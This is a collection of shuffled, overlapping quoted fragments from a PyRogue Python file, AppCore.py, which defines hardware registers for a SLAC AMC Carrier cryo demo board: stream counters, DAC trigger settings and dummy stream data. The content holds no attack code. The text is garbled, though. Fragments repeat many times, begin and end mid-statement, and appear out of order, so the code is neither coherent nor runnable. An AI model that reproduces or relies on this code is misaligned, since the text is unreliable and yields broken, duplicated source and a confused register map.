"units = \"1/(307MHz)\", )) self.add(pr.RemoteVariable( name = \"DacSigTrigArm\", description = \"DacSig TrigArm\", offset",
"pollInterval = 1, )) self.add(pr.RemoteVariable( name = \"EofeCounter\", description = \"Stream EOFE counter\",",
"= \"Reset stream EOFE\", offset = 0x00000008, bitSize = 1, bitOffset = 9,",
"**kwargs) ######### # Devices ######### # for i in range(2): # if ((numRxLanes[i]",
"pr from common.SimRtmCryoDet import * class StreamData(pr.Device): def __init__( self, name = \"StreamReg\",",
"= 16, bitOffset = 0, base = pr.Int, mode = \"RW\", )) class",
"0x03000004, bitSize = 1, bitOffset = 0, base = pr.UInt, mode = \"WO\",",
"bitSize = 1, bitOffset = 8, base = pr.UInt, mode = \"RW\", ))",
"= 0x00000008, bitSize = 1, bitOffset = 0, base = pr.UInt, mode =",
"= \"1/(307MHz)\", )) self.add(pr.RemoteVariable( name = \"DacSigTrigArm\", description = \"DacSig TrigArm\", offset =",
"description = \"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices self.add(pr.RemoteVariable( name",
"\"EofeCounterRst\", description = \"Reset stream EOFE\", offset = 0x00000008, bitSize = 1, bitOffset",
"= \"AppCore\", description = \"MicrowaveMux Application\", numRxLanes = [0,0], numTxLanes = [0,0], **kwargs):",
"description = \"Stream EOFE counter\", offset = 0x00000010, bitSize = 32, bitOffset =",
")) self.add(pr.RemoteVariable( name = \"StreamCounterRst\", description = \"Reset stream counters\", offset = 0x00000008,",
"for i in range(4096): self.add(pr.RemoteVariable( name = f'StreamData[{i}]', description = \"Dummy stream data\",",
"= pr.UInt, mode = \"WO\", hidden = True, )) self.add(StreamControl( offset=0x03000000, )) self.add(StreamData(",
"self.add(SysgenCryo(offset=0x01000000, expand=True)) self.add(SimRtmCryoDet( offset=0x02000000, expand=False)) ########### # Registers ########### self.add(pr.RemoteVariable( name = \"DacSigTrigDelay\",",
"contained in the LICENSE.txt file. #----------------------------------------------------------------------------- import pyrogue as pr from common.SimRtmCryoDet import",
"description = \"Reset stream counters\", offset = 0x00000008, bitSize = 1, bitOffset =",
"file. #----------------------------------------------------------------------------- import pyrogue as pr from common.SimRtmCryoDet import * class StreamData(pr.Device): def",
"copied, modified, propagated, or distributed except according to the terms # contained in",
"self.add(StreamData( offset=0x04000000, expand=False, )) ############################## # Commands ############################## @self.command(description=\"Arms for a DAC SIG",
"numTxLanes = [0,0], **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices ######### # for",
"#----------------------------------------------------------------------------- # Title : PyRogue AMC Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- #",
"control\", **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices self.add(pr.RemoteVariable( name = \"EnableStreams\", description",
"# copied, modified, propagated, or distributed except according to the terms # contained",
"0, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"StreamCounterRst\", description",
"super().__init__(name=name, description=description, **kwargs) ######### # Devices ######### # for i in range(2): #",
": AppCore.py # Created : 2017-04-03 #----------------------------------------------------------------------------- # Description: # PyRogue AMC Carrier",
"# of this distribution and at: # https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. # No part of the",
"= pr.UInt, mode = \"RW\", units = \"1/(307MHz)\", )) self.add(pr.RemoteVariable( name = \"DacSigTrigArm\",",
"\"RW\", )) self.add(pr.RemoteVariable( name = \"StreamCounter\", description = \"Count number of stream triggers\",",
"EOFE counter\", offset = 0x00000010, bitSize = 32, bitOffset = 0, base =",
"TrigDelay\", offset = 0x03000000, bitSize = 24, bitOffset = 0, base = pr.UInt,",
"= 1, )) class AppCore(pr.Device): def __init__( self, name = \"AppCore\", description =",
"offset = 0x00000008, bitSize = 1, bitOffset = 9, base = pr.UInt, mode",
"name = \"StreamCounterRst\", description = \"Reset stream counters\", offset = 0x00000008, bitSize =",
"# expand = True, # )) # # self.add(SysgenCryo(offset=0x01000000, expand=True)) self.add(SimRtmCryoDet( offset=0x02000000, expand=False))",
"of the rogue software platform, including this file, may be # copied, modified,",
"This file is part of the rogue software platform. It is subject to",
"# Created : 2017-04-03 #----------------------------------------------------------------------------- # Description: # PyRogue AMC Carrier Cryo Demo",
"\"MicrowaveMux Application\", numRxLanes = [0,0], numTxLanes = [0,0], **kwargs): super().__init__(name=name, description=description, **kwargs) #########",
"self.add(SimRtmCryoDet( offset=0x02000000, expand=False)) ########### # Registers ########### self.add(pr.RemoteVariable( name = \"DacSigTrigDelay\", description =",
"name = \"EofeCounter\", description = \"Stream EOFE counter\", offset = 0x00000010, bitSize =",
"self, name = \"AppCore\", description = \"MicrowaveMux Application\", numRxLanes = [0,0], numTxLanes =",
"= \"StreamControl\", description = \"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices",
"stream counters\", offset = 0x00000008, bitSize = 1, bitOffset = 8, base =",
"\"StreamCounterRst\", description = \"Reset stream counters\", offset = 0x00000008, bitSize = 1, bitOffset",
"######### # Devices self.add(pr.RemoteVariable( name = \"EnableStreams\", description = \"EnableStream\", offset = 0x00000008,",
"pr.UInt, mode = \"RO\", pollInterval = 1, )) class AppCore(pr.Device): def __init__( self,",
"= 24, bitOffset = 0, base = pr.UInt, mode = \"RW\", units =",
"<filename>firmware/common/pyrogue/common/AppCore.py #!/usr/bin/env python #----------------------------------------------------------------------------- # Title : PyRogue AMC Carrier Cryo Demo Board",
"0) or (numTxLanes[i] > 0)): # self.add(AmcMicrowaveMuxCore( # name = \"MicrowaveMuxCore[%i]\" % (i),",
"Commands ############################## @self.command(description=\"Arms for a DAC SIG Trigger to the DAQ MUX\",) def",
"= pr.UInt, mode = \"RO\", pollInterval = 1, )) self.add(pr.RemoteVariable( name = \"EofeCounter\",",
"i*0x2, bitSize = 16, bitOffset = 0, base = pr.Int, mode = \"RW\",",
"description = \"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices for i",
"Application #----------------------------------------------------------------------------- # This file is part of the rogue software platform. It",
"\"EnableStream\", offset = 0x00000008, bitSize = 1, bitOffset = 0, base = pr.UInt,",
"at: # https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. # No part of the rogue software platform, including this",
"# # self.add(SysgenCryo(offset=0x01000000, expand=True)) self.add(SimRtmCryoDet( offset=0x02000000, expand=False)) ########### # Registers ########### self.add(pr.RemoteVariable( name",
"and at: # https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. # No part of the rogue software platform, including",
"range(2): # if ((numRxLanes[i] > 0) or (numTxLanes[i] > 0)): # self.add(AmcMicrowaveMuxCore( #",
")) class StreamControl(pr.Device): def __init__( self, name = \"StreamControl\", description = \"Stream control\",",
"0x00000008, bitSize = 1, bitOffset = 9, base = pr.UInt, mode = \"RW\",",
"bitOffset = 0, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name =",
"import * class StreamData(pr.Device): def __init__( self, name = \"StreamReg\", description = \"Stream",
"description = \"EnableStream\", offset = 0x00000008, bitSize = 1, bitOffset = 0, base",
"= \"DacSig TrigArm\", offset = 0x03000004, bitSize = 1, bitOffset = 0, base",
")) class AppCore(pr.Device): def __init__( self, name = \"AppCore\", description = \"MicrowaveMux Application\",",
"i in range(2): # if ((numRxLanes[i] > 0) or (numTxLanes[i] > 0)): #",
"\"DacSigTrigDelay\", description = \"DacSig TrigDelay\", offset = 0x03000000, bitSize = 24, bitOffset =",
"self.add(pr.RemoteVariable( name = \"DacSigTrigDelay\", description = \"DacSig TrigDelay\", offset = 0x03000000, bitSize =",
"self.add(StreamControl( offset=0x03000000, )) self.add(StreamData( offset=0x04000000, expand=False, )) ############################## # Commands ############################## @self.command(description=\"Arms for",
"= pr.Int, mode = \"RW\", )) class StreamControl(pr.Device): def __init__( self, name =",
"base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"StreamCounterRst\", description =",
"self, name = \"StreamControl\", description = \"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs) #########",
")) ############################## # Commands ############################## @self.command(description=\"Arms for a DAC SIG Trigger to the",
"= 0x00000008, bitSize = 1, bitOffset = 8, base = pr.UInt, mode =",
"self.add(pr.RemoteVariable( name = \"DacSigTrigArm\", description = \"DacSig TrigArm\", offset = 0x03000004, bitSize =",
"= 0x03000004, bitSize = 1, bitOffset = 0, base = pr.UInt, mode =",
"offset=0x03000000, )) self.add(StreamData( offset=0x04000000, expand=False, )) ############################## # Commands ############################## @self.command(description=\"Arms for a",
"= True, )) self.add(StreamControl( offset=0x03000000, )) self.add(StreamData( offset=0x04000000, expand=False, )) ############################## # Commands",
"the license terms in the LICENSE.txt file found in the top-level directory #",
"**kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices for i in range(4096): self.add(pr.RemoteVariable( name",
"description = \"DacSig TrigDelay\", offset = 0x03000000, bitSize = 24, bitOffset = 0,",
"+ i*0x2, bitSize = 16, bitOffset = 0, base = pr.Int, mode =",
"in the LICENSE.txt file found in the top-level directory # of this distribution",
"the rogue software platform. It is subject to # the license terms in",
"\"Reset stream EOFE\", offset = 0x00000008, bitSize = 1, bitOffset = 9, base",
"part of the rogue software platform. It is subject to # the license",
"= pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"StreamCounter\", description = \"Count",
"AMC Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- # This file is part of",
"stream data\", offset = 0x000000 + i*0x2, bitSize = 16, bitOffset = 0,",
"to # the license terms in the LICENSE.txt file found in the top-level",
"def __init__( self, name = \"StreamReg\", description = \"Stream control\", **kwargs): super().__init__(name=name, description=description,",
"1, bitOffset = 8, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name",
"= \"StreamCounter\", description = \"Count number of stream triggers\", offset = 0x0000000C, bitSize",
"PyRogue AMC Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- # File : AppCore.py #",
"from common.SimRtmCryoDet import * class StreamData(pr.Device): def __init__( self, name = \"StreamReg\", description",
"the LICENSE.txt file found in the top-level directory # of this distribution and",
"Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- # File : AppCore.py # Created :",
"= \"RW\", units = \"1/(307MHz)\", )) self.add(pr.RemoteVariable( name = \"DacSigTrigArm\", description = \"DacSig",
"# offset = (i*0x00100000), # expand = True, # )) # # self.add(SysgenCryo(offset=0x01000000,",
"= 1, bitOffset = 0, base = pr.UInt, mode = \"WO\", hidden =",
"0x00000008, bitSize = 1, bitOffset = 0, base = pr.UInt, mode = \"RW\",",
"= \"MicrowaveMux Application\", numRxLanes = [0,0], numTxLanes = [0,0], **kwargs): super().__init__(name=name, description=description, **kwargs)",
"name = \"StreamReg\", description = \"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs) ######### #",
"**kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices ######### # for i in range(2):",
")) self.add(StreamData( offset=0x04000000, expand=False, )) ############################## # Commands ############################## @self.command(description=\"Arms for a DAC",
"True, # )) # # self.add(SysgenCryo(offset=0x01000000, expand=True)) self.add(SimRtmCryoDet( offset=0x02000000, expand=False)) ########### # Registers",
"mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"StreamCounter\", description = \"Count number of",
"**kwargs) ######### # Devices for i in range(4096): self.add(pr.RemoteVariable( name = f'StreamData[{i}]', description",
"distributed except according to the terms # contained in the LICENSE.txt file. #-----------------------------------------------------------------------------",
"#----------------------------------------------------------------------------- import pyrogue as pr from common.SimRtmCryoDet import * class StreamData(pr.Device): def __init__(",
"= \"RW\", )) self.add(pr.RemoteVariable( name = \"StreamCounter\", description = \"Count number of stream",
"__init__( self, name = \"AppCore\", description = \"MicrowaveMux Application\", numRxLanes = [0,0], numTxLanes",
"######### # Devices ######### # for i in range(2): # if ((numRxLanes[i] >",
"= \"Count number of stream triggers\", offset = 0x0000000C, bitSize = 32, bitOffset",
"0, base = pr.UInt, mode = \"RO\", pollInterval = 1, )) self.add(pr.RemoteVariable( name",
"0x000000 + i*0x2, bitSize = 16, bitOffset = 0, base = pr.Int, mode",
"PyRogue AMC Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- # This file is part",
"= \"StreamCounterRst\", description = \"Reset stream counters\", offset = 0x00000008, bitSize = 1,",
"bitSize = 24, bitOffset = 0, base = pr.UInt, mode = \"RW\", units",
"# self.add(SysgenCryo(offset=0x01000000, expand=True)) self.add(SimRtmCryoDet( offset=0x02000000, expand=False)) ########### # Registers ########### self.add(pr.RemoteVariable( name =",
"= 0, base = pr.UInt, mode = \"WO\", hidden = True, )) self.add(StreamControl(",
"counters\", offset = 0x00000008, bitSize = 1, bitOffset = 8, base = pr.UInt,",
"self.add(pr.RemoteVariable( name = f'StreamData[{i}]', description = \"Dummy stream data\", offset = 0x000000 +",
"to the terms # contained in the LICENSE.txt file. #----------------------------------------------------------------------------- import pyrogue as",
"name = \"EnableStreams\", description = \"EnableStream\", offset = 0x00000008, bitSize = 1, bitOffset",
"StreamData(pr.Device): def __init__( self, name = \"StreamReg\", description = \"Stream control\", **kwargs): super().__init__(name=name,",
"offset = 0x00000008, bitSize = 1, bitOffset = 0, base = pr.UInt, mode",
"\"DacSig TrigArm\", offset = 0x03000004, bitSize = 1, bitOffset = 0, base =",
"= 32, bitOffset = 0, base = pr.UInt, mode = \"RO\", pollInterval =",
"in range(2): # if ((numRxLanes[i] > 0) or (numTxLanes[i] > 0)): # self.add(AmcMicrowaveMuxCore(",
"hidden = True, )) self.add(StreamControl( offset=0x03000000, )) self.add(StreamData( offset=0x04000000, expand=False, )) ############################## #",
"\"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices for i in range(4096):",
"found in the top-level directory # of this distribution and at: # https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.",
"rogue software platform, including this file, may be # copied, modified, propagated, or",
"stream EOFE\", offset = 0x00000008, bitSize = 1, bitOffset = 9, base =",
"= 0, base = pr.Int, mode = \"RW\", )) class StreamControl(pr.Device): def __init__(",
"bitOffset = 0, base = pr.Int, mode = \"RW\", )) class StreamControl(pr.Device): def",
"= \"WO\", hidden = True, )) self.add(StreamControl( offset=0x03000000, )) self.add(StreamData( offset=0x04000000, expand=False, ))",
"the LICENSE.txt file. #----------------------------------------------------------------------------- import pyrogue as pr from common.SimRtmCryoDet import * class",
"# for i in range(2): # if ((numRxLanes[i] > 0) or (numTxLanes[i] >",
"bitOffset = 0, base = pr.UInt, mode = \"RO\", pollInterval = 1, ))",
"= \"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices for i in",
"= \"RW\", )) class StreamControl(pr.Device): def __init__( self, name = \"StreamControl\", description =",
"= \"EnableStreams\", description = \"EnableStream\", offset = 0x00000008, bitSize = 1, bitOffset =",
"= 0x00000008, bitSize = 1, bitOffset = 9, base = pr.UInt, mode =",
"directory # of this distribution and at: # https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. # No part of",
"= \"MicrowaveMuxCore[%i]\" % (i), # offset = (i*0x00100000), # expand = True, #",
"= \"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices self.add(pr.RemoteVariable( name =",
"32, bitOffset = 0, base = pr.UInt, mode = \"RO\", pollInterval = 1,",
"f'StreamData[{i}]', description = \"Dummy stream data\", offset = 0x000000 + i*0x2, bitSize =",
"Title : PyRogue AMC Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- # File :",
"# Devices for i in range(4096): self.add(pr.RemoteVariable( name = f'StreamData[{i}]', description = \"Dummy",
"is part of the rogue software platform. It is subject to # the",
"\"Dummy stream data\", offset = 0x000000 + i*0x2, bitSize = 16, bitOffset =",
"(numTxLanes[i] > 0)): # self.add(AmcMicrowaveMuxCore( # name = \"MicrowaveMuxCore[%i]\" % (i), # offset",
"= \"DacSig TrigDelay\", offset = 0x03000000, bitSize = 24, bitOffset = 0, base",
"= 0, base = pr.UInt, mode = \"RO\", pollInterval = 1, )) self.add(pr.RemoteVariable(",
"description = \"Reset stream EOFE\", offset = 0x00000008, bitSize = 1, bitOffset =",
"name = \"StreamCounter\", description = \"Count number of stream triggers\", offset = 0x0000000C,",
"= \"DacSigTrigDelay\", description = \"DacSig TrigDelay\", offset = 0x03000000, bitSize = 24, bitOffset",
"description = \"Dummy stream data\", offset = 0x000000 + i*0x2, bitSize = 16,",
"including this file, may be # copied, modified, propagated, or distributed except according",
"Application\", numRxLanes = [0,0], numTxLanes = [0,0], **kwargs): super().__init__(name=name, description=description, **kwargs) ######### #",
"TrigArm\", offset = 0x03000004, bitSize = 1, bitOffset = 0, base = pr.UInt,",
"16, bitOffset = 0, base = pr.Int, mode = \"RW\", )) class StreamControl(pr.Device):",
"# self.add(AmcMicrowaveMuxCore( # name = \"MicrowaveMuxCore[%i]\" % (i), # offset = (i*0x00100000), #",
"\"WO\", hidden = True, )) self.add(StreamControl( offset=0x03000000, )) self.add(StreamData( offset=0x04000000, expand=False, )) ##############################",
"LICENSE.txt file found in the top-level directory # of this distribution and at:",
"> 0) or (numTxLanes[i] > 0)): # self.add(AmcMicrowaveMuxCore( # name = \"MicrowaveMuxCore[%i]\" %",
"= 1, )) self.add(pr.RemoteVariable( name = \"EofeCounter\", description = \"Stream EOFE counter\", offset",
"= \"RW\", )) self.add(pr.RemoteVariable( name = \"EofeCounterRst\", description = \"Reset stream EOFE\", offset",
"name = \"AppCore\", description = \"MicrowaveMux Application\", numRxLanes = [0,0], numTxLanes = [0,0],",
"* class StreamData(pr.Device): def __init__( self, name = \"StreamReg\", description = \"Stream control\",",
"# PyRogue AMC Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- # This file is",
"= 8, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"EofeCounterRst\",",
"= 0x03000000, bitSize = 24, bitOffset = 0, base = pr.UInt, mode =",
")) # # self.add(SysgenCryo(offset=0x01000000, expand=True)) self.add(SimRtmCryoDet( offset=0x02000000, expand=False)) ########### # Registers ########### self.add(pr.RemoteVariable(",
"offset = 0x03000000, bitSize = 24, bitOffset = 0, base = pr.UInt, mode",
"Cryo Demo Board Application #----------------------------------------------------------------------------- # This file is part of the rogue",
": PyRogue AMC Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- # File : AppCore.py",
"# File : AppCore.py # Created : 2017-04-03 #----------------------------------------------------------------------------- # Description: # PyRogue",
"% (i), # offset = (i*0x00100000), # expand = True, # )) #",
"0, base = pr.Int, mode = \"RW\", )) class StreamControl(pr.Device): def __init__( self,",
"Registers ########### self.add(pr.RemoteVariable( name = \"DacSigTrigDelay\", description = \"DacSig TrigDelay\", offset = 0x03000000,",
"bitOffset = 8, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name =",
"Demo Board Application #----------------------------------------------------------------------------- # File : AppCore.py # Created : 2017-04-03 #-----------------------------------------------------------------------------",
"def __init__( self, name = \"StreamControl\", description = \"Stream control\", **kwargs): super().__init__(name=name, description=description,",
"self.add(pr.RemoteVariable( name = \"EofeCounter\", description = \"Stream EOFE counter\", offset = 0x00000010, bitSize",
"Cryo Demo Board Application #----------------------------------------------------------------------------- # File : AppCore.py # Created : 2017-04-03",
"######### # Devices for i in range(4096): self.add(pr.RemoteVariable( name = f'StreamData[{i}]', description =",
"Devices self.add(pr.RemoteVariable( name = \"EnableStreams\", description = \"EnableStream\", offset = 0x00000008, bitSize =",
"0, base = pr.UInt, mode = \"WO\", hidden = True, )) self.add(StreamControl( offset=0x03000000,",
"\"Stream EOFE counter\", offset = 0x00000010, bitSize = 32, bitOffset = 0, base",
"class AppCore(pr.Device): def __init__( self, name = \"AppCore\", description = \"MicrowaveMux Application\", numRxLanes",
"It is subject to # the license terms in the LICENSE.txt file found",
"mode = \"WO\", hidden = True, )) self.add(StreamControl( offset=0x03000000, )) self.add(StreamData( offset=0x04000000, expand=False,",
"= [0,0], numTxLanes = [0,0], **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices #########",
"\"EnableStreams\", description = \"EnableStream\", offset = 0x00000008, bitSize = 1, bitOffset = 0,",
"0, base = pr.UInt, mode = \"RW\", units = \"1/(307MHz)\", )) self.add(pr.RemoteVariable( name",
"base = pr.UInt, mode = \"RO\", pollInterval = 1, )) class AppCore(pr.Device): def",
"= 0x000000 + i*0x2, bitSize = 16, bitOffset = 0, base = pr.Int,",
"name = \"DacSigTrigArm\", description = \"DacSig TrigArm\", offset = 0x03000004, bitSize = 1,",
"of this distribution and at: # https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. # No part of the rogue",
"#----------------------------------------------------------------------------- # File : AppCore.py # Created : 2017-04-03 #----------------------------------------------------------------------------- # Description: #",
"######### # for i in range(2): # if ((numRxLanes[i] > 0) or (numTxLanes[i]",
"# This file is part of the rogue software platform. It is subject",
"#!/usr/bin/env python #----------------------------------------------------------------------------- # Title : PyRogue AMC Carrier Cryo Demo Board Application",
"File : AppCore.py # Created : 2017-04-03 #----------------------------------------------------------------------------- # Description: # PyRogue AMC",
"Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- # This file is part of the",
"pr.Int, mode = \"RW\", )) class StreamControl(pr.Device): def __init__( self, name = \"StreamControl\",",
"\"DacSig TrigDelay\", offset = 0x03000000, bitSize = 24, bitOffset = 0, base =",
"self.add(pr.RemoteVariable( name = \"EnableStreams\", description = \"EnableStream\", offset = 0x00000008, bitSize = 1,",
"software platform, including this file, may be # copied, modified, propagated, or distributed",
"StreamControl(pr.Device): def __init__( self, name = \"StreamControl\", description = \"Stream control\", **kwargs): super().__init__(name=name,",
"# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. # No part of the rogue software platform, including this file,",
"mode = \"RO\", pollInterval = 1, )) self.add(pr.RemoteVariable( name = \"EofeCounter\", description =",
"= f'StreamData[{i}]', description = \"Dummy stream data\", offset = 0x000000 + i*0x2, bitSize",
"# contained in the LICENSE.txt file. #----------------------------------------------------------------------------- import pyrogue as pr from common.SimRtmCryoDet",
"1, )) class AppCore(pr.Device): def __init__( self, name = \"AppCore\", description = \"MicrowaveMux",
"= 0, base = pr.UInt, mode = \"RO\", pollInterval = 1, )) class",
"1, bitOffset = 0, base = pr.UInt, mode = \"WO\", hidden = True,",
"platform. It is subject to # the license terms in the LICENSE.txt file",
"in the top-level directory # of this distribution and at: # https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. #",
"offset = 0x00000010, bitSize = 32, bitOffset = 0, base = pr.UInt, mode",
"expand=True)) self.add(SimRtmCryoDet( offset=0x02000000, expand=False)) ########### # Registers ########### self.add(pr.RemoteVariable( name = \"DacSigTrigDelay\", description",
"########### self.add(pr.RemoteVariable( name = \"DacSigTrigDelay\", description = \"DacSig TrigDelay\", offset = 0x03000000, bitSize",
"mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"EofeCounterRst\", description = \"Reset stream EOFE\",",
"for i in range(2): # if ((numRxLanes[i] > 0) or (numTxLanes[i] > 0)):",
"# No part of the rogue software platform, including this file, may be",
"1, bitOffset = 9, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name",
"\"RW\", units = \"1/(307MHz)\", )) self.add(pr.RemoteVariable( name = \"DacSigTrigArm\", description = \"DacSig TrigArm\",",
"this file, may be # copied, modified, propagated, or distributed except according to",
": 2017-04-03 #----------------------------------------------------------------------------- # Description: # PyRogue AMC Carrier Cryo Demo Board Application",
"> 0)): # self.add(AmcMicrowaveMuxCore( # name = \"MicrowaveMuxCore[%i]\" % (i), # offset =",
"the terms # contained in the LICENSE.txt file. #----------------------------------------------------------------------------- import pyrogue as pr",
"2017-04-03 #----------------------------------------------------------------------------- # Description: # PyRogue AMC Carrier Cryo Demo Board Application #-----------------------------------------------------------------------------",
"\"MicrowaveMuxCore[%i]\" % (i), # offset = (i*0x00100000), # expand = True, # ))",
"according to the terms # contained in the LICENSE.txt file. #----------------------------------------------------------------------------- import pyrogue",
"pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"StreamCounter\", description = \"Count number",
"(i), # offset = (i*0x00100000), # expand = True, # )) # #",
"base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"StreamCounter\", description =",
"bitOffset = 0, base = pr.UInt, mode = \"RW\", units = \"1/(307MHz)\", ))",
"0x00000010, bitSize = 32, bitOffset = 0, base = pr.UInt, mode = \"RO\",",
"########### # Registers ########### self.add(pr.RemoteVariable( name = \"DacSigTrigDelay\", description = \"DacSig TrigDelay\", offset",
"terms # contained in the LICENSE.txt file. #----------------------------------------------------------------------------- import pyrogue as pr from",
"AMC Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- # File : AppCore.py # Created",
"or (numTxLanes[i] > 0)): # self.add(AmcMicrowaveMuxCore( # name = \"MicrowaveMuxCore[%i]\" % (i), #",
"self.add(pr.RemoteVariable( name = \"StreamCounterRst\", description = \"Reset stream counters\", offset = 0x00000008, bitSize",
"= 1, bitOffset = 8, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable(",
"= \"Stream EOFE counter\", offset = 0x00000010, bitSize = 32, bitOffset = 0,",
"description = \"DacSig TrigArm\", offset = 0x03000004, bitSize = 1, bitOffset = 0,",
"\"AppCore\", description = \"MicrowaveMux Application\", numRxLanes = [0,0], numTxLanes = [0,0], **kwargs): super().__init__(name=name,",
"offset = 0x00000008, bitSize = 1, bitOffset = 8, base = pr.UInt, mode",
"# name = \"MicrowaveMuxCore[%i]\" % (i), # offset = (i*0x00100000), # expand =",
"super().__init__(name=name, description=description, **kwargs) ######### # Devices self.add(pr.RemoteVariable( name = \"EnableStreams\", description = \"EnableStream\",",
"software platform. It is subject to # the license terms in the LICENSE.txt",
"distribution and at: # https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. # No part of the rogue software platform,",
"# Description: # PyRogue AMC Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- # This",
"numRxLanes = [0,0], numTxLanes = [0,0], **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices",
"= 0x00000010, bitSize = 32, bitOffset = 0, base = pr.UInt, mode =",
"name = \"EofeCounterRst\", description = \"Reset stream EOFE\", offset = 0x00000008, bitSize =",
"\"RO\", pollInterval = 1, )) self.add(pr.RemoteVariable( name = \"EofeCounter\", description = \"Stream EOFE",
"propagated, or distributed except according to the terms # contained in the LICENSE.txt",
"offset=0x04000000, expand=False, )) ############################## # Commands ############################## @self.command(description=\"Arms for a DAC SIG Trigger",
"# Devices ######### # for i in range(2): # if ((numRxLanes[i] > 0)",
"rogue software platform. It is subject to # the license terms in the",
"\"RW\", )) self.add(pr.RemoteVariable( name = \"StreamCounterRst\", description = \"Reset stream counters\", offset =",
"[0,0], numTxLanes = [0,0], **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices ######### #",
"self.add(AmcMicrowaveMuxCore( # name = \"MicrowaveMuxCore[%i]\" % (i), # offset = (i*0x00100000), # expand",
"AppCore(pr.Device): def __init__( self, name = \"AppCore\", description = \"MicrowaveMux Application\", numRxLanes =",
"mode = \"RW\", units = \"1/(307MHz)\", )) self.add(pr.RemoteVariable( name = \"DacSigTrigArm\", description =",
"part of the rogue software platform, including this file, may be # copied,",
"the top-level directory # of this distribution and at: # https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. # No",
"= \"StreamReg\", description = \"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices",
"#----------------------------------------------------------------------------- # Description: # PyRogue AMC Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- #",
"offset = 0x03000004, bitSize = 1, bitOffset = 0, base = pr.UInt, mode",
"= pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"StreamCounterRst\", description = \"Reset",
"0x00000008, bitSize = 1, bitOffset = 8, base = pr.UInt, mode = \"RW\",",
"name = \"StreamControl\", description = \"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs) ######### #",
"stream triggers\", offset = 0x0000000C, bitSize = 32, bitOffset = 0, base =",
"\"RW\", )) class StreamControl(pr.Device): def __init__( self, name = \"StreamControl\", description = \"Stream",
"= \"RO\", pollInterval = 1, )) self.add(pr.RemoteVariable( name = \"EofeCounter\", description = \"Stream",
"of stream triggers\", offset = 0x0000000C, bitSize = 32, bitOffset = 0, base",
"class StreamControl(pr.Device): def __init__( self, name = \"StreamControl\", description = \"Stream control\", **kwargs):",
"\"DacSigTrigArm\", description = \"DacSig TrigArm\", offset = 0x03000004, bitSize = 1, bitOffset =",
"= [0,0], **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices ######### # for i",
"= pr.UInt, mode = \"RO\", pollInterval = 1, )) class AppCore(pr.Device): def __init__(",
")) self.add(pr.RemoteVariable( name = \"DacSigTrigArm\", description = \"DacSig TrigArm\", offset = 0x03000004, bitSize",
"pr.UInt, mode = \"WO\", hidden = True, )) self.add(StreamControl( offset=0x03000000, )) self.add(StreamData( offset=0x04000000,",
")) self.add(StreamControl( offset=0x03000000, )) self.add(StreamData( offset=0x04000000, expand=False, )) ############################## # Commands ############################## @self.command(description=\"Arms",
")) self.add(pr.RemoteVariable( name = \"EofeCounter\", description = \"Stream EOFE counter\", offset = 0x00000010,",
"Devices for i in range(4096): self.add(pr.RemoteVariable( name = f'StreamData[{i}]', description = \"Dummy stream",
"if ((numRxLanes[i] > 0) or (numTxLanes[i] > 0)): # self.add(AmcMicrowaveMuxCore( # name =",
"mode = \"RW\", )) class StreamControl(pr.Device): def __init__( self, name = \"StreamControl\", description",
"or distributed except according to the terms # contained in the LICENSE.txt file.",
"expand=False)) ########### # Registers ########### self.add(pr.RemoteVariable( name = \"DacSigTrigDelay\", description = \"DacSig TrigDelay\",",
